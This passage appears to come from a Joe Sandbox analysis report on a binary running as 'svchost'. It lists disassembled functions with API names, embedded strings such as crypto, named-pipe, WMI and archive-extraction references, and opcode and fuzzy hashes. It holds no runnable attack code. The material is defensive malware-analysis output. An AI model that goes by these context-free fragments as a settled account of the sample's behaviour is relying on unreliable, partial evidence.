                                      • Instruction Fuzzy Hash: A331FD21B0469185F7609F22E8057B9BAF1EB44BE4F548735DE5C8BBC5CE3CD5058304
                                      Function 00007FF669AC9AE4 Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: FormatInfoLocaleNumber
                                      • String ID:
                                      • API String ID: 2169056816-0
                                      • Opcode ID: c59c861be7a078541e30cde009b828222bb83b28d91b2917d66e0be88f6e8dfa
                                      • Instruction ID: 3323c96efd0129bc5b5459fabf67633b7ed85df81da677f29bdc266998669a49
                                      • Opcode Fuzzy Hash: c59c861be7a078541e30cde009b828222bb83b28d91b2917d66e0be88f6e8dfa
                                      • Instruction Fuzzy Hash: AB114A22A18B85D5E7618F11E8403EA73B4FF88B48F844135DE8C8BA54EF7CD546C744
                                      Function 00007FF669AB4224 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: Version
                                      • String ID:
                                      • API String ID: 1889659487-0
                                      • Opcode ID: c411fd5ded362d50915c368b3c5811918dab1970b9969c2428285441b409caa2
                                      • Instruction ID: 537749756df7daa2202762daee5d5a1636d0ef9acff043077d85efee75ff0c73
                                      • Opcode Fuzzy Hash: c411fd5ded362d50915c368b3c5811918dab1970b9969c2428285441b409caa2
                                      • Instruction Fuzzy Hash: C7012C71A0C58AC5FAA15F60A4153BA37F0AF6A309F440134DD8C8F6AADF2CA448DA04
                                      Function 00007FF669ADFC60 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: HeapProcess
                                      • String ID:
                                      • API String ID: 54951025-0
                                      • Opcode ID: 8ef6bd8a1415cb7c5da5da35a15a7e13ba77f4b6edacbf61990d264b926fc8c2
                                      • Instruction ID: 5a541bdced0b725a50569beee6e7fb406f9339a2e8698775f2bcf9458f9f5853
                                      • Opcode Fuzzy Hash: 8ef6bd8a1415cb7c5da5da35a15a7e13ba77f4b6edacbf61990d264b926fc8c2
                                      • Instruction Fuzzy Hash: C1B09220E07B46C2EB492F596C8265422F4BF4CB10F990038C81C94320DE3C20E56701
                                      Function 00007FF669ABD484 Relevance: .0, Instructions: 39COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6a4fac86f8f1a6b9d8c17b4c2881c5c96027003405599c7815143c772f625e0d
                                      • Instruction ID: 21740b6e3e1032ca491645764e876a88a8947f7d5bdb2c71b51fe22b0cdb7488
                                      • Opcode Fuzzy Hash: 6a4fac86f8f1a6b9d8c17b4c2881c5c96027003405599c7815143c772f625e0d
                                      • Instruction Fuzzy Hash: 12F0B2A1A1C00AD2FB6C5828981A33920F6AB52314F64887BED1ACE2C9DC9DB9919109
                                      Function 00007FF669AB5D18 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 447COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                      • String ID: DXGIDebug.dll$UNC$\$\$\\?\
                                      • API String ID: 4097890229-2826201243
                                      • Opcode ID: 4478dfd7ebda127dd6d45acd1d8672479a12dc3f843589c1fec9a3a33b3a8959
                                      • Instruction ID: cfc8d6bccd74f3fcac6d49b0600854320666220551d54f0dd6be6cb60513ab4a
                                      • Opcode Fuzzy Hash: 4478dfd7ebda127dd6d45acd1d8672479a12dc3f843589c1fec9a3a33b3a8959
                                      • Instruction Fuzzy Hash: 2E129122A09B8AC1EB109F65E0401BDB7B1EB85B94F505231EE5D9BBE9DF7CE584C340
                                      Function 00007FF669AC673C Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 204memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn$Global$AllocCreateStream
                                      • String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
                                      • API String ID: 2868844859-1533471033
                                      • Opcode ID: 89809a7b50bc6049c64b6db06e6ca983a36b379378358c442292962ae0a9aa9f
                                      • Instruction ID: 5d0b8c2597b2eb0716c9a24ca1cbf2f6206dd924c25f2bc33f2f9e6e3508bc59
                                      • Opcode Fuzzy Hash: 89809a7b50bc6049c64b6db06e6ca983a36b379378358c442292962ae0a9aa9f
                                      • Instruction Fuzzy Hash: 38817C62F18A46D5FB00DFA5D4402FD33B1AB48798F404636DE1DAE79AEE38E54AC344
                                      Function 00007FF669ADD590 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo
                                      • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                      • API String ID: 3215553584-2617248754
                                      • Opcode ID: 129f0f23fb98aa196cf11125cf189078a62f1fcea35804d155ad867a369635b6
                                      • Instruction ID: bbadeeea0a8c1066eefda16cf57d656cbe55f17fba783f82d2ee80fa963516c4
                                      • Opcode Fuzzy Hash: 129f0f23fb98aa196cf11125cf189078a62f1fcea35804d155ad867a369635b6
                                      • Instruction Fuzzy Hash: 33418A32A09B85C9EB04CF25E8417AE37F4EB18398F005536EE5C8BB94DE38D029C740
                                      Function 00007FF669ACEBF8 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: Window$MessageObjectSend$ClassDeleteLongName
                                      • String ID: STATIC
                                      • API String ID: 2845197485-1882779555
                                      • Opcode ID: 4dd6d5dc918661da1f3624fd6136043f65082c3b4d04d17e028a08c7ae34189a
                                      • Instruction ID: 7eeac2642c35e75ae9e9af109067db5b430dccac3f65411c8fba28b1915617c5
                                      • Opcode Fuzzy Hash: 4dd6d5dc918661da1f3624fd6136043f65082c3b4d04d17e028a08c7ae34189a
                                      • Instruction Fuzzy Hash: FC317C25A08646C6EB659F12A5157BA23F1FF89BD0F504430DE4E8FB55EE3CE8068B40
                                      Function 00007FF669ACA6B0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 97COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: ItemTextWindow
                                      • String ID: LICENSEDLG
                                      • API String ID: 2478532303-2177901306
                                      • Opcode ID: 082efc828564f9cbac089f32b7dc64d375ba9598fdabf3838a5d706b83ee7c6d
                                      • Instruction ID: 86b7424283cdb4c609a6f52d120b502c476a782d045c880058bbdfed0723bb57
                                      • Opcode Fuzzy Hash: 082efc828564f9cbac089f32b7dc64d375ba9598fdabf3838a5d706b83ee7c6d
                                      • Instruction Fuzzy Hash: 0F416831A18A56C2FB548F11A94877932B2BB8AB94F544135DE0D8FBA4CF3DA9468740
                                      Function 00007FF669ABB2FC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 82libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: AddressProc$CurrentDirectoryProcessSystem
                                      • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                      • API String ID: 2915667086-2207617598
                                      • Opcode ID: 63d2197320245242f8b0de3d330f8e78444bfd864ace6ce5733bd314b656da32
                                      • Instruction ID: a5113952c2688ddf32e4bdbad98e8a7567c40f0b615250762db609cb4bc8c319
                                      • Opcode Fuzzy Hash: 63d2197320245242f8b0de3d330f8e78444bfd864ace6ce5733bd314b656da32
                                      • Instruction Fuzzy Hash: 0A313624A0DB4BC1FA109F16AA9057A77F0BF89B90F451236CD5E8F7A8DE7CE445A340
                                      Function 00007FF669AA2D94 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103filepipeCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: File$NamedPipe$CreateErrorLastPeekReadWaitWrite
                                      • String ID: \\.\pipe\
                                      • API String ID: 687869086-91387939
                                      • Opcode ID: 775a8035613ed1d19014cf5cf142c3491cf5c4671f54193dbf5003945902ee6f
                                      • Instruction ID: 5c1860526c580b1bca6b1a04799e59d2f0b7b05c715bd08b01c57cd7d2a5dde9
                                      • Opcode Fuzzy Hash: 775a8035613ed1d19014cf5cf142c3491cf5c4671f54193dbf5003945902ee6f
                                      • Instruction Fuzzy Hash: F4411A22618A81D7EB20CF25E4507AAB3B1FB88B58F404135EE4D8AA98CF7CD559CB00
                                      Function 00007FF669AD467C Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 320COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
                                      • String ID: csm$csm$csm
                                      • API String ID: 2940173790-393685449
                                      • Opcode ID: 3935ea780d766a9afaff3bdc445d07aba12077bcddd6091db91b1da3f6c0d63e
                                      • Instruction ID: 716f5cc09e4bf7adbaa148e9f48221c45f5c70fa0d3ff308482e21e557e667b4
                                      • Opcode Fuzzy Hash: 3935ea780d766a9afaff3bdc445d07aba12077bcddd6091db91b1da3f6c0d63e
                                      • Instruction Fuzzy Hash: 77E18B72A08782CAEB209F25D4853AD7BF0EB55788F144235DE8D8B796DF38E589C740
                                      Function 00007FF669AB42AC Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 158COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: AllocClearStringVariant
                                      • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                      • API String ID: 1959693985-3505469590
                                      • Opcode ID: 11e3559986fec1d2ed21cea1281b02686d4db21b248b00765fc5a15c015bbab8
                                      • Instruction ID: 3906bf54d14f7a2d9f5d19e98175f8df018a823f83ca79ba486ff4b7a075be34
                                      • Opcode Fuzzy Hash: 11e3559986fec1d2ed21cea1281b02686d4db21b248b00765fc5a15c015bbab8
                                      • Instruction Fuzzy Hash: 84710936A14B49C6EB10CF69E8905AD77F4FB98B98B455132DE4E8BBA8CF38D444C700
                                      Function 00007FF669AD621C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF669AD6423,?,?,?,00007FF669AD40EE,?,?,?,00007FF669AD40A9), ref: 00007FF669AD62A1
                                      • GetLastError.KERNEL32(?,?,00000000,00007FF669AD6423,?,?,?,00007FF669AD40EE,?,?,?,00007FF669AD40A9), ref: 00007FF669AD62AF
                                      • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF669AD6423,?,?,?,00007FF669AD40EE,?,?,?,00007FF669AD40A9), ref: 00007FF669AD62D9
                                      • FreeLibrary.KERNEL32(?,?,00000000,00007FF669AD6423,?,?,?,00007FF669AD40EE,?,?,?,00007FF669AD40A9), ref: 00007FF669AD6347
                                      • GetProcAddress.KERNEL32(?,?,00000000,00007FF669AD6423,?,?,?,00007FF669AD40EE,?,?,?,00007FF669AD40A9), ref: 00007FF669AD6353
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                      • String ID: api-ms-
                                      • API String ID: 2559590344-2084034818
                                      • Opcode ID: 8c967af58753effb9ee27394aad689f6c3124d9316ed138daee22ba4e84c5920
                                      • Instruction ID: 689b43a76e27f6a5701af25f901c70e82f6896bde14387048cca8f627a89aa6b
                                      • Opcode Fuzzy Hash: 8c967af58753effb9ee27394aad689f6c3124d9316ed138daee22ba4e84c5920
                                      • Instruction Fuzzy Hash: 5B31AF21B1AA42D2EE519F06A80057933F4BF59BA0F5A4635DE2E8F790EF3CE4488310
                                      Function 00007FF669AD0FCC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 43libraryloaderCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(?,?,?,00007FF669AD0F38,?,?,?,00007FF669AD137D), ref: 00007FF669AD0FF3
                                      • GetProcAddress.KERNEL32(?,?,?,00007FF669AD0F38,?,?,?,00007FF669AD137D), ref: 00007FF669AD1010
                                      • GetProcAddress.KERNEL32(?,?,?,00007FF669AD0F38,?,?,?,00007FF669AD137D), ref: 00007FF669AD102C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: AddressProc$HandleModule
                                      • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                      • API String ID: 667068680-1718035505
                                      • Opcode ID: bef4845c716d6fdf20741acb37857c46c4d833d92e094d65c1bb9acd70036fe8
                                      • Instruction ID: 13bfa9519b51f77df7d1d5faa2b2079f1e34928a9a40484926e842d5f9343efc
                                      • Opcode Fuzzy Hash: bef4845c716d6fdf20741acb37857c46c4d833d92e094d65c1bb9acd70036fe8
                                      • Instruction Fuzzy Hash: 4F112D21A0EB86C5FE69AF10AA4027533F26F09798F491435CD4ECE755EE7DF5889380
                                      Function 00007FF669AB6BE4 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 230COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID: .rar$exe$rar$sfx
                                      • API String ID: 3668304517-630704357
                                      • Opcode ID: a899538301f951457d491095515a351fa1e77726a9d97ad66d6b93861eb248e3
                                      • Instruction ID: 1d66222c371b4fc2e289fcf2385b36a34d7499cd4dd762ac35bd5f3dc7c6d940
                                      • Opcode Fuzzy Hash: a899538301f951457d491095515a351fa1e77726a9d97ad66d6b93861eb248e3
                                      • Instruction Fuzzy Hash: C0A1AA22E08A4AC0EA009F29D4512BC33F1EF41BA8F545231DE1D9B7AADF7CE599C340
                                      Function 00007FF669AD4B80 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 191COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: abort$CallEncodePointerTranslator
                                      • String ID: MOC$RCC
                                      • API String ID: 2889003569-2084237596
                                      • Opcode ID: 107c64c1dd9d1996c43b0727a946b15215050c392489a6b9acfa9adfedc51f6a
                                      • Instruction ID: 8e45496dc253c950acbe546b6c0929e7eef45f4c21ddaf91477106f35f57c3c4
                                      • Opcode Fuzzy Hash: 107c64c1dd9d1996c43b0727a946b15215050c392489a6b9acfa9adfedc51f6a
                                      • Instruction Fuzzy Hash: 17915C72A08791CAE750DF65E8802AD7BF0FB45788F144129EE8D9B799DF38D199C700
                                      Function 00007FF669AAC564 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 134COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
